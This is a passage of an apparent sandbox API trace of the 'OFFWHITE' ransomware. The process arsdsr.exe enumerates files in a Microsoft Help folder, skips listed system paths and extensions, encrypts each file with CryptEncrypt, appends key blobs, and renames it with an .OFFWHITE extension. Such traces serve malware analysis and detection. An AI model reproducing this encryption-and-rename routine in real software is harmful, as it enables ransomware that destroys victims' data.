lpNewFilePointer=0x0) returned 1 [0147.561] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x146, lpOverlapped=0x0) returned 1 [0147.562] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.562] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x146, lpOverlapped=0x0) returned 1 [0147.562] GetProcessHeap () returned 0x500000 [0147.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.562] CloseHandle (hObject=0xb0) returned 1 [0147.562] GetProcessHeap () returned 0x500000 [0147.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.562] GetProcessHeap () returned 0x500000 [0147.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.562] GetProcessHeap () returned 0x500000 [0147.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.562] GetProcessHeap () returned 0x500000 [0147.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.562] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" [0147.562] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.OFFWHITE" [0147.562] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.offwhite")) returned 1 [0147.563] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.563] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.563] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.563] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" [0147.563] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.564] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.564] PathFindExtensionW (pszPath="MS.VISIO.DEV.14.1033.hxn") returned=".hxn" [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.564] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.564] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.564] GetProcessHeap () returned 0x500000 [0147.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526cc8 [0147.564] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.565] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=350) returned 1 [0147.565] GetProcessHeap () returned 0x500000 [0147.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.565] GetProcessHeap () returned 0x500000 [0147.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.565] GetProcessHeap () returned 0x500000 [0147.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.565] GetProcessHeap () returned 0x500000 [0147.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.565] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.565] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.565] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.566] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.566] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.566] SetLastError (dwErrCode=0x0) [0147.566] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.567] GetLastError () returned 0x0 [0147.567] GetLastError () returned 0x0 [0147.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x25e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.567] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.567] WriteFile (in: hFile=0xb0, lpBuffer=0x526cc8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526cc8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.567] GetProcessHeap () returned 0x500000 [0147.567] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15e) returned 0x52ebe8 [0147.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.567] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x15e, lpOverlapped=0x0) returned 1 [0147.567] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.568] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x15e, lpOverlapped=0x0) returned 1 [0147.568] GetProcessHeap () returned 0x500000 [0147.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.568] CloseHandle (hObject=0xb0) returned 1 [0147.568] GetProcessHeap () returned 0x500000 [0147.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.568] GetProcessHeap () returned 0x500000 [0147.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.568] GetProcessHeap () returned 0x500000 [0147.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.568] GetProcessHeap () returned 0x500000 [0147.568] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.568] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" [0147.568] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.OFFWHITE" [0147.569] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.offwhite")) returned 1 [0147.569] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.VISIO.SHAPESHEET.14.1033.hxn", cAlternateFileName="MSVISI~4.HXN")) returned 1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".") returned 1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="..") returned 1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="...") returned 1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="windows") returned -1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="rsa") returned -1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="programdata") returned -1 [0147.569] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="appdata") returned 1 [0147.570] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="program files") returned -1 [0147.570] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.570] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.570] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" [0147.570] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.570] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.570] PathFindExtensionW (pszPath="MS.VISIO.SHAPESHEET.14.1033.hxn") returned=".hxn" [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.570] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.570] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.570] GetProcessHeap () returned 0x500000 [0147.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526cd8 [0147.570] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.571] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=392) returned 1 [0147.571] GetProcessHeap () returned 0x500000 [0147.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.571] GetProcessHeap () returned 0x500000 [0147.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.571] GetProcessHeap () returned 0x500000 [0147.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.571] GetProcessHeap () returned 0x500000 [0147.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.571] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.571] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.571] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.572] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.572] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x188, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.572] SetLastError (dwErrCode=0x0) [0147.572] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.573] GetLastError () returned 0x0 [0147.573] GetLastError () returned 0x0 [0147.573] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.573] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.573] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x388, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.573] WriteFile (in: hFile=0xb0, lpBuffer=0x526cd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526cd8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x188) returned 0x52ebe8 [0147.574] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.574] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x188, lpOverlapped=0x0) returned 1 [0147.574] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.574] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x188, lpOverlapped=0x0) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.574] CloseHandle (hObject=0xb0) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.574] GetProcessHeap () returned 0x500000 [0147.574] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.574] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" [0147.574] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.OFFWHITE" [0147.574] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.offwhite")) returned 1 [0147.580] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.VISIO_PRM.14.1033.hxn", cAlternateFileName="MSE1C9~1.HXN")) returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2=".") returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="..") returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="...") returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="windows") returned -1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="rsa") returned -1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="programdata") returned -1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="appdata") returned 1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="program files") returned -1 [0147.580] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.580] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.580] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" [0147.580] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.580] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.580] PathFindExtensionW (pszPath="MS.VISIO_PRM.14.1033.hxn") returned=".hxn" [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.580] lstrcmpiW (lpString1=".hxn", 